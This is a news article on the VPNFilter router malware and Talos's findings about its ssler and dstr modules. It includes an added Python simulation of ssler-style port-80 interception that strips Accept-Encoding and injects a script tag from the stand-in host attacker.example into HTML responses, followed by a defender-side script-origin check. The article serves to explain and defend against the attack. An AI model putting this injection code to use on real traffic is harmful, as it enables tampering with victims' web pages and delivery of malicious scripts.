VPNFilter Continues to Target More Devices

This recently discovered malware takes control of home and small-office routers and uses them to run man-in-the-middle (MITM) attacks against the devices behind them. Read on for further analysis of this threat.

by Karen Minton · Jun. 15, 18 · Analysis


The malware known as VPNFilter is infecting more models and variants of devices, and it has gained new capabilities, including the ability to deliver exploits to endpoint devices and to survive reboots, according to reports from Cisco Talos.

Cisco Talos found that VPNFilter had infected at least 500,000 networking devices, mostly consumer-grade Wi-Fi routers, in at least 54 countries.

Until the most recent Talos update, the devices known to be infected by VPNFilter were MikroTik, Linksys, TP-Link, and Netgear networking equipment used in small office and home office (SOHO) environments, along with QNAP network-attached storage (NAS) devices.

In a new blog post, Cisco Talos expanded the list of affected devices to include models from ZTE, Ubiquiti, D-Link, Huawei, Upvel, and Asus, and identified further affected models from Linksys, Netgear, MikroTik, and TP-Link. Talos, Cisco's threat-intelligence group, said that no Cisco network devices are known to be infected.

Apart from adding more devices to the list, Cisco Talos reported a newly found stage 3 module dubbed "ssler," which injects malicious content into web traffic as it passes through the network device. This lets the actor deliver exploits to endpoints behind the router through a man-in-the-middle (MITM) attack.

The blog post added that this finding confirms the threat goes well beyond what the actor can do on the network device itself: it extends to every network that sits behind an infected device.

After the earlier Cisco Talos report, the FBI asked households and small businesses to reboot their routers immediately. A reboot alone does not end the threat, though: VPNFilter's first-stage loader survives a reboot, so the device can be re-infected with stage 2 and stage 3 modules such as ssler.

Ssler provides data exfiltration and JavaScript injection by intercepting all traffic destined for port 80 that passes through the compromised device, and it can deliver malicious payloads to other devices on the affected network. Talos expects ssler to be executed with a parameter list that defines the module's behaviour and specifies which websites to target.

Ssler then intercepts every outgoing web request on port 80 so that it can be inspected and modified before being forwarded to the legitimate HTTP server.
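The interception flow described above, as an added example that is not part of the original article and not code from VPNFilter or from Talos: a simulated in-path module matches the Host header of a plaintext port-80 request against a target list, forwards the request without its Accept-Encoding header (a generic MITM step, assumed here, so the server answers with uncompressed HTML that can be rewritten), and injects a script tag into the HTML response. The host names, the payload URL and the sample request and response are constructed. The last function is the defender's side: a check over a received page body that lists script origins not on an allowlist, which is how an injected tag shows up when a plaintext page is compared with what the site is expected to serve.

```python
"""Simulated ssler-style port-80 interception plus a client-side integrity check."""
import re
from urllib.parse import urljoin, urlsplit

# Constructed "parameter list": hosts whose plaintext HTTP traffic is targeted.
TARGET_HOSTS = {"bank.example", "shop.example"}

# Constructed payload; a real module would point at infrastructure the actor controls.
INJECTED_SCRIPT = b'<script src="http://attacker.example/x.js"></script>'


def split_message(raw):
    """Split a raw HTTP message into (list of head lines, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head.split(b"\r\n"), body


def request_host(raw_request):
    """Return the lowercase Host header value without any port, or None."""
    lines, _ = split_message(raw_request)
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"host":
            return value.strip().decode("ascii", "replace").split(":")[0].lower()
    return None


def intercept_request(raw_request, targets=TARGET_HOSTS):
    """Return (request to forward, in_scope).

    Requests for hosts outside the target list pass through untouched. For
    targeted hosts the Accept-Encoding header is dropped (assumed generic MITM
    behaviour) so the response body arrives uncompressed and can be modified.
    """
    if request_host(raw_request) not in targets:
        return raw_request, False
    lines, body = split_message(raw_request)
    kept = [l for l in lines if not l.lower().startswith(b"accept-encoding:")]
    return b"\r\n".join(kept) + b"\r\n\r\n" + body, True


def inject_into_response(raw_response, payload=INJECTED_SCRIPT):
    """Insert payload before </body> of an HTML response and fix Content-Length."""
    lines, body = split_message(raw_response)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    if not headers.get(b"content-type", b"").lower().startswith(b"text/html"):
        return raw_response  # only HTML is rewritten
    if b"</body>" not in body:
        return raw_response
    new_body = body.replace(b"</body>", payload + b"</body>", 1)
    new_lines = []
    for line in lines:
        if line.lower().startswith(b"content-length:"):
            new_lines.append(b"Content-Length: " + str(len(new_body)).encode())
        else:
            new_lines.append(line)
    return b"\r\n".join(new_lines) + b"\r\n\r\n" + new_body


SCRIPT_SRC = re.compile(rb'<script\b[^>]*\bsrc=["\']([^"\']+)["\']', re.I)


def unexpected_script_origins(html_body, page_url, allowed_origins):
    """Defender-side check: origins of <script src=...> tags not on the allowlist."""
    found = []
    for match in SCRIPT_SRC.finditer(html_body):
        src = match.group(1).decode("utf-8", "replace")
        parts = urlsplit(urljoin(page_url, src))  # resolve relative sources
        origin = f"{parts.scheme}://{parts.netloc}"
        if origin not in allowed_origins:
            found.append(origin)
    return found


# Constructed sample traffic for a stand-alone run.
SAMPLE_REQUEST = (b"GET / HTTP/1.1\r\nHost: bank.example\r\n"
                  b"Accept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\n\r\n")
SAMPLE_BODY = b'<html><body><script src="/app.js"></script><p>Balance</p></body></html>'
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
                   b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n\r\n"
                   + SAMPLE_BODY)


def run_demo():
    """Walk the sample request/response through the interceptor and the check."""
    forwarded, in_scope = intercept_request(SAMPLE_REQUEST)
    tampered = inject_into_response(SAMPLE_RESPONSE)
    _, body = split_message(tampered)
    return {
        "in_scope": in_scope,
        "accept_encoding_stripped": b"Accept-Encoding" not in forwarded,
        "foreign_scripts": unexpected_script_origins(
            body, "http://bank.example/", {"http://bank.example"}),
    }


if __name__ == "__main__":
    print(run_demo())
```

The same allowlist check run on the page fetched over HTTPS returns an empty list, which is the practical comparison a defender can make: if the plaintext copy of a page carries script origins the HTTPS copy does not, something on the path between the client and the server is rewriting port-80 traffic.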

The other new stage 3 module, the device destruction module dstr, gives any stage 2 module that lacks a kill command the ability to disable the infected device.

In effect it performs the kill operation itself: it removes all of its related files and every other trace of VPNFilter from the router, and then renders the device unusable.

According to Talos, these findings show that the threat from VPNFilter continues to grow. Since the malware is still active and keeps finding new devices and new ways to spread, it is crucial to protect your networks and devices; a robust security program together with a firewall can help protect your devices from VPNFilter.


Published at DZone with permission of Karen Minton. See the original article here.
